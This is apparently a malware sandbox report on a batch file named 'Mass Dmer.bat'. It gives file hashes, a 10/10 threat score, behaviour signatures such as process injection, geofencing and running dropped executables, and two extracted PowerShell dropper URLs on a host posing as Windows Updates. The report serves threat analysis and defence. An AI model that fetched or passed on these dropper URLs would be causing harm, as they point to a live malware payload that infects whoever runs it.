Overview

overview

10

Static

static

1

Mass Dmer.bat

windows10-1703-x64

10

Mass Dmer.bat

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Mass Dmer.bat

  • Size

    1KB

  • Sample

    231111-lcczqscg71

  • MD5

    5ac8897ff732070a7ffe9147c599e01e

  • SHA1

    39db3eccc2d8a1e06038282c49c6af405cf44431

  • SHA256

    0ad689faa00e511421c71ea560cb430a29c4de5572c8be8b8f1df2974bce02b5

  • SHA512

    7951c6f9d2fdf3450fdc76befca65587aa2c13fec385afa272f2359d8778379e9cebf9fdcc06ce636b162f1505d15ae15aa165deb1bac748eaba275891fb1c0b

Score
10/10
pyinstaller

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rooptimizer.windowsupdates.repl.co/Uni.bat

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://rooptimizer.windowsupdates.repl.co/function.exe

Targets

    • Target

      Mass Dmer.bat

    • Size

      1KB

    • MD5

      5ac8897ff732070a7ffe9147c599e01e

    • SHA1

      39db3eccc2d8a1e06038282c49c6af405cf44431

    • SHA256

      0ad689faa00e511421c71ea560cb430a29c4de5572c8be8b8f1df2974bce02b5

    • SHA512

      7951c6f9d2fdf3450fdc76befca65587aa2c13fec385afa272f2359d8778379e9cebf9fdcc06ce636b162f1505d15ae15aa165deb1bac748eaba275891fb1c0b

    Score
    10/10
    pyinstaller

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Blocklisted process makes network request

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks